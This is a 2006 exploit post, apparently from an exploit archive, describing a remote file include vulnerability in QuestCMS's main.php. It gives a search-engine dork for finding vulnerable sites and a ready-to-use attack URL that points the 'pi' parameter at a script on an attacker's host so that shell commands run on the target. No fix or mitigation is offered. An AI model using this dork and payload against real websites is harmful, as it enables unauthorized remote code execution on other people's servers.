QuestCMS (main.php) Remote File Include Vulnerability

2006-08-07 00:00:00

!!!!!!!!!WWW.SÝBERSAVASCÝLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------

Title : Questcms Remote File Include Vulnerability

--------------------------------------------------------------------------------
#Author: Crackers_Child


#cont@ct: [email protected]

--------------------------------------------------------------------------------
Affected software description :
--------------------------------------------------------------------------------
Application : Questwork Web Content Management system (QuestCMS)
URL : http://www.questwork.com

--------------------------------------------------------------------------------

dork : allinurl:"/questcms/"
Exploit :

--------------------------------------------------------------------------------

Usage:

http://[target]/[questcms_path]/main/main.php?pi=http://[evilhost]/cmd.txt?&cmd=ls

--------------------------------------------------------------------------------

greets:

X_ALPREN_X,Root_Mor and My Other Friends

--------------------------------------------------------------------------------



--------------------------------- [ WWW.SÝBERSAVASCÝLAR.COM ] --------------------------------------

#

Fixes

No fixes

In order to submit a new fix you need to be registered.